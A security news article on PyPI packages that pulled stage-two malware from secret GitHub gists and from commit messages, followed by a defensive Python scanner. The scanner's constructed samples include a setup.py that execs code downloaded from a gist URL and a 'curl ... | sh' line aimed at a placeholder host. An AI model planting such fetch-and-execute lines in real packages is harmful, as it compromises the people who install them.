Researchers have come across a GitHub account abusing two features of the site to host stage-two malware.
Hackers have increasingly been repurposing public services as headquarters for their misdeeds — housing malware in public code repositories or file-sharing services, and performing command-and-control (C2) from messaging apps. Sometimes they get even more creative, utilizing software-as-a-service (SaaS) platforms in ways you'd never be able to guess.
Continuing this tradition is yeremyvalidslov2342 (hereafter "Yeremy"), an account connected with multiple malicious packages identified by ReversingLabs on Dec. 19. To sneak payloads past both repository admins and victims, Yeremy's packages fetched their second stage from two rarely abused GitHub features: secret "gists" and commit messages.
New Ways of Abusing GitHub for Cyber Gain
The most common way cybercriminals will abuse public code repositories is by simply publishing their malicious files to throwaway accounts. It's obvious yet crude, as administrators work to identify and take down such accounts as soon as they're spotted.
Yeremy took a more circuitous approach, first publishing a series of packages to the Python Package Index (PyPI), another frequently abused repository. The packages were presented as honest libraries for handling network proxying, but their setup file contained a Base64-encoded string that concealed a URL pointing to a secret GitHub "gist." Because a package's setup file runs at install time, the victim's machine reaches out to that URL as soon as the package is pip-installed.
Gists are a lightweight kind of Git repository, designed to let coders store and share snippets of code without setting up entire projects around them. They can be public or "secret": not listed or searchable, but reachable by anyone who has the URL, which makes them easy to share with colleagues and just as easy to hand to a malicious installer.
The secret gist referenced by the PyPI packages hosted the stage-two malware. The researchers found only one other documented use of gists for this purpose, buried in a 2019 Trend Micro report about a Slack backdoor.
Yeremy was also connected to one other PyPI package with a malicious setup file. On execution, this package cloned a GitHub repository, most likely a copy of the legitimate PySocks project, and read its payload not from the repository's files but from a commit message, a place that neither file scanners nor casual reviewers tend to look.
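One way to look for both tricks in a package before installing it, as an added example that is not ReversingLabs' code or anything taken from the packages in the report: the scanner below pulls Base64-looking tokens out of a setup.py and out of git commit messages, decodes them, and flags any that decode to a URL or to Python code. The staging-host list, the sample setup.py, the gist URL and the stage-two snippet are all constructed for this example.

```python
"""Detect Base64-hidden URLs in setup.py and Base64-hidden code in commit messages.

Added example, not code from ReversingLabs or from the malicious packages.
Every sample input below is constructed; the gist URL and the stage-two
snippet are placeholders, not real ones.
"""
import base64
import binascii
import re
from urllib.parse import urlparse

# A Base64 token: at least 24 alphabet characters, optional '=' padding.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
URL_RE = re.compile(r"^https?://\S+$")
# Substrings that a decoded Python second stage is likely to contain.
CODE_MARKERS = ("import ", "exec(", "eval(", "subprocess", "urlopen", "os.system")
# Hosts commonly used to stage payloads (assumed list for the example).
STAGING_HOSTS = {
    "gist.github.com",
    "gist.githubusercontent.com",
    "raw.githubusercontent.com",
    "pastebin.com",
}


def decode_b64_text(token):
    """Return the token decoded as UTF-8 text, or None if it is not Base64 text."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def classify(decoded):
    """Label decoded text: 'staging-url', 'url', 'code', or None if it looks harmless."""
    text = decoded.strip()
    if URL_RE.match(text):
        host = urlparse(text).netloc.lower()
        return "staging-url" if host in STAGING_HOSTS else "url"
    if any(marker in decoded for marker in CODE_MARKERS):
        return "code"
    return None


def scan_text(text, source):
    """Return one finding per Base64 token in `text` that decodes to a URL or code."""
    findings = []
    for match in B64_TOKEN.finditer(text):
        decoded = decode_b64_text(match.group(0))
        if decoded is None:
            continue  # not valid Base64 text: a hash, an identifier, noise
        kind = classify(decoded)
        if kind:
            findings.append({"source": source, "kind": kind, "decoded": decoded})
    return findings


def scan_setup_py(source):
    """Scan the text of a setup.py for encoded download URLs (the gist trick)."""
    return scan_text(source, "setup.py")


def scan_commit_messages(messages):
    """Scan a list of commit messages for encoded payloads (the commit-message trick)."""
    findings = []
    for i, msg in enumerate(messages):
        findings.extend(scan_text(msg, f"commit[{i}]"))
    return findings


# --- constructed samples (placeholders, not real indicators) ---------------
FAKE_GIST_URL = "https://gist.github.com/someuser/0123456789abcdef0123456789abcdef"
SAMPLE_SETUP_PY = f'''
from setuptools import setup
import base64, urllib.request
_u = base64.b64decode("{base64.b64encode(FAKE_GIST_URL.encode()).decode()}").decode()
exec(urllib.request.urlopen(_u).read())   # stage two pulled from a secret gist
setup(name="proxy-helper", version="0.1.0", description="SOCKS proxy helper")
'''

FAKE_STAGE_TWO = "import os\nos.system('curl -s https://example.invalid/x | sh')\n"
SAMPLE_COMMITS = [
    "Fix typo in README",
    "Merge branch 'main' into feature (ref 3f1c9a7b2d4e6f8a0b1c2d3e4f5a6b7c8d9e0f1a)",
    "Update proxy handling\n\n" + base64.b64encode(FAKE_STAGE_TWO.encode()).decode(),
]

if __name__ == "__main__":
    for f in scan_setup_py(SAMPLE_SETUP_PY) + scan_commit_messages(SAMPLE_COMMITS):
        print(f"{f['source']}: {f['kind']} -> {f['decoded'][:60]!r}")
```

Run the file directly to see the findings for the embedded samples; for a real package, pass the text of its setup.py to `scan_setup_py` and a list of commit messages (for example, `git log --format=%B` collected one commit at a time) to `scan_commit_messages`. The second commit above carries a 40-character hex hash that the token regex happens to match, and the scanner discards it because it decodes to nothing meaningful. Base64 is only one of many encodings an attacker can choose, so a clean result means the absence of this particular trick, not a clean package.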
How Public Services Help Hackers
Carrying out cyberattacks from one's own infrastructure does offer a certain degree of resilience against account takedowns, but using shared and open source resources has the advantage of stealth.
"Some malware authors are afraid of getting detected," notes Karlo Zanki, the author of Tuesday's report. But, he adds, "if malicious code is properly obfuscated, public services aren't so good at detecting it."
"Package repositories like npm and PyPI receive thousands of daily packages," he continues, "and there isn't an easy way to monitor and analyze them. Some repositories do scanning with traditional antivirus solutions, but very often malicious packages get past those basic defenses. So they have limited resources, and it's not likely that they will have money or motivation to make everything that gets published secure. It's up to users of those packages to protect themselves."
Public software services also offer a host of extra upsides for attackers. It's quicker, easier, and cheaper to create an account on a popular website than it is to arrange traditional infrastructure. The company running the site handles maintenance and uptime, and such sites are typically very reliable. Traffic to popular sites draws far less suspicion than traffic to unknown servers in far-off countries, and it blends in with the legitimate GitHub and PyPI traffic that most developer networks already allow. And what's the harm if a malicious account gets taken down? Just create a new one.
"If I were a malicious actor," Zanki concludes, "I would definitely not waste my time on running my own infrastructure."